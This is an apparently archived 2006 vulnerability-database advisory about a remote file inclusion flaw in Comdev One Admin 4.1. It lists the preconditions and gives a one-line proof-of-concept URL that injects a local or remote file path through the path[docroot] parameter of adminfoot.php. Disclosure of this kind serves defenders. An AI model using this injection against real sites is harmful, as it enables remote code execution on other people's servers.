Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14740
HistoryOct 19, 2006 - 12:00 a.m.

Comdev One Admin 4.1 Remote File Inclusion

2006-10-1900:00:00
vulners.com
16

/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Comdev One Admin 4.1
http://www.comdevweb.com/oneadmin.php

VULNERABILITY:
Remote File Inclusion

NOTES:

  • requires register globals on
  • requires magic quotes off

POC:
<host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1491

/****************************************/